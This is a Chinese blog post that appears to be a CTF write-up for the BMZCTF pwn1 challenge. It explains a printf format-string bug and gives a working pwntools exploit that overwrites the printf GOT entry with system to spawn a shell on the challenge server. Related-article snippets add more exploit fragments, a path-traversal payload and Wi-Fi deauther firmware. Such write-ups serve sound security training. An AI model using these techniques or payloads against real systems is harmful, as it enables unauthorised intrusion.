[BMZCTF-pwn] 22-pwn1

最新推荐文章于 2022-02-20 00:30:00 发布
最新推荐文章于 2022-02-20 00:30:00 发布
阅读量157 收藏
点赞数
分类专栏: CTF pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/122955763
版权

昨天整了第一届BMZCTF的pwn题,都来得及写。这一届一共五个pwn题,难度逐个增加。

第一个是个32位no pie,got表可写。程序很短,直接调用无格式参数的printf,而且有循环,got表还有system项。基本属于无障碍型。

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  char s[100]; // [esp+18h] [ebp-70h] BYREF
  unsigned int v4; // [esp+7Ch] [ebp-Ch]

  v4 = __readgsdword(0x14u);
  init();
  menu();
  puts(" Wealcome to BMZCTF ");
  while ( 1 )
  {
    memset(s, 0, sizeof(s));
    read(0, s, 0x64u);
    printf(s);
  }
}

思路就是

先用AAAA-%X-%X-%X....得到偏移10

然后直接用fmtstr_payload工具生成串,将printf的got表内容改为plt[system]

最后再发送/bin/sh让printf执行system(/bin/sh)

from pwn import *

local = 0
if local == 1:
    p = process('./pwn')
else:
    p = remote('www.bmzclub.cn', 21355) 

elf = ELF('./pwn')
context(arch = 'i386', log_level = 'debug') #

payload = fmtstr_payload(10, {elf.got['printf']: elf.plt['system']})
p.sendline(payload)
p.sendline(b'/bin/sh\x00')
p.sendline(b'cat /flag')
p.interactive()

石氏是时试
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[BMZCTF-pwn] 00-pwnpwnpwn
weixin_52640415的博客
02-11 1207
BUUCTF的题作到0解区,既作不出来也找到不wp,放弃了。今天开始上xctfclub.cn上来玩。 一般题都是从简单开始,也不一定,一上来就是个盲pwn 。 远程连接后,输出欢迎信息,然后输入后会回显。 思路: 如果是堆啥的怎么也得给点,不给就没办法了,至少有个泄露。这里的回显猜是printf的输出用AAAA-%x-%x...测试,可以得到一些有用信息 有0804XXXX这个应该是32位no pie #3 得到个栈地址指向输入串,不清楚怎么用, #10是输入偏移 #39是libc_s
BMZ公开赛PWN题
qq_36495104的博客
12-28 1358
pwn1 exp #coding=utf-8 from pwn import * context.log_level="info" binary="./pwn1" elf=ELF(binary) #sh=process(binary) sh=remote("47.242.59.61",10000) vuln=0x80486AE memset_got=elf.got['memset'] sh.recvuntil("e to BMZCTF \n") payload=fmtstr_payload(10,{mem
[BMZCTF-pwn] 27-pwn5
weixin_52640415的博客
02-16 363
最后一题,集众坑于一身: 保护全开,got表不可写 输入长度0x38不太小也不大 有leak菜单项添乱, 其中fmt_attack有格式化字符串漏洞,但要每次开开关v3=0。 get_flag会执行close(1)关闭输出这个没想到怎么解决,如果拿到shell以后可以用exec 1>&0在这里没想到怎么弄。需要得到secret,这个可以泄露也可以通过printf置0。 没有return都...
第一届BMZCTF公开赛-MISC-Writeup
末初的CSDN博客
12-28 5998
文章目录Tiga Tiga vim查看tiga.txt发现存在零宽度字符 零宽度字符隐写在线站:https://yuanfux.github.io/zero-width-web/ 得到misc.zip密码:GiveTiGaGuang! 迪迦.jpg文件尾附加了youcanalso.zip的密码信息 file.zip的密码很明显需要通过爆破这些密码片段文件的CRC得到内容 爆破脚本如下: import binascii import string def crack_crc(): print
BMZCTF:memory
末初的CSDN博客
12-13 1040
http://bmzclub.cn/challenges#memory 题目描述.txt 分析内存镜像,破解管理员的登录密码,flag为明文密码的MD5值 把内存中所有用户的hash全部dump出来 存为文件,使用john进行爆破 得到Administrator账户密码:12345678 PS C:\Users\Administrator> php -r "var_dump(md5('12345678'));" Command line code:1: string(32) "25d55a
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018年pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.csdn.net/A951860555/article/details/110350773
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
ctf题库ctf-pwn赛题收集
03-31
ctf题库 CTF(夺旗赛)题库是一个由安全专家和爱好者们制作的一系列网络安全挑战。... ...每个类别都包含多个挑战,每个挑战都有一个或多个标志(flag)。参赛者必须通过解决每个挑战来获取相应的标志,然后提交标志以获得...
2020_WHUCTF_Writeup(部分)
热门推荐
lysecl‘s blog
05-28 4万+
0x1 crypto bvibvi 首先要通过验证问题,对一个等式计算求解,简单的枚举求解即可。 通过验证过后,需要回答一系列问题,是关于B站BV号和AV号的。 题目给出BV号,让我们找出对应的AV号。多组正确后再给AV号,让我们找出BV号。 简单的了解了下Bilibili的av号和bv号知识后,发现 av号对应url格式为 url =‘https://www.bilibili.com/video/av’+aid bv号为 url =‘https://www.bilibili.com/video/’+b
BMZCTF hctf_2018_warmup
qq_26243045的博客
11-29 408
打开页面为一张图片: 查看源码: 发现`source.php`,进行访问,看到源码: 对源码进行分析: 传入file的内容,被取?前内容两次,两次分别过白名单,没有其他过滤,可以跨目录读文件。 再看下hint.php内容: 由此可知是文件包含漏洞。 构造payload: `http://www.bmzclub.cn:20320/source.php?file=hint.php?/../../../../flaaagg` 即可得到flag:BMZCTF{6ce9e1.
BMZCTF:真正的CTFer
末初的CSDN博客
12-13 1898
http://bmzclub.cn/challenges#%E7%9C%9F%E6%AD%A3%E7%9A%84CTFer 修改了图片宽高,通过脚本爆破CRC还原下图片的原始的宽高 import struct import zlib def hexStr2bytes(s): b = b"" for i in range(0,len(s),2): temp = s[i:i+2] b +=struct.pack("B",int(temp,16))
BMZCTF:网鼎杯 2018 minified
末初的CSDN博客
12-17 433
http://bmzclub.cn/challenges#%E7%BD%91%E9%BC%8E%E6%9D%AF%202018%20minified flag_enc.png 使用stegsolve打开,将每个色道的零通道取出来 Alpha0 Red0 Green0 Blue0 将Alpha0和Green0进行Image Combiner,当XOR时出现flag flag{7bb6db9f-d2eb-4e69-8dee-0002ce1e07f9} ...
[BMZCTF-pwn] 41-sctf2020-coolcode
weixin_52640415的博客
02-20 537
又到不会区了,搜出来复现一下,学习学习 unsigned __int64 m1add() { int v1; // [rsp+Ch] [rbp-14h] BYREF void *s; // [rsp+10h] [rbp-10h] unsigned __int64 v3; // [rsp+18h] [rbp-8h] v3 = __readfsqword(0x28u); v1 = 0; printf("Index: "); __isoc99_scanf("%d", &v
光纤振动传感器的研究.doc
07-16
传感器
光纤位移传感器实验.doc
07-16
传感器
传感器原理课程实践.doc
最新发布
07-16
传感器
mqtt-pwn安装
09-20
1. 克隆mqtt-pwn仓库:使用命令`git clone https://github.com/akamai-threat-research/mqtt-pwn.git`将mqtt-pwn仓库克隆到本地。 2. 进入mqtt-pwn目录:使用命令`cd mqtt-pwn`进入mqtt-pwn所在的目录。 3. 启动mqtt...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值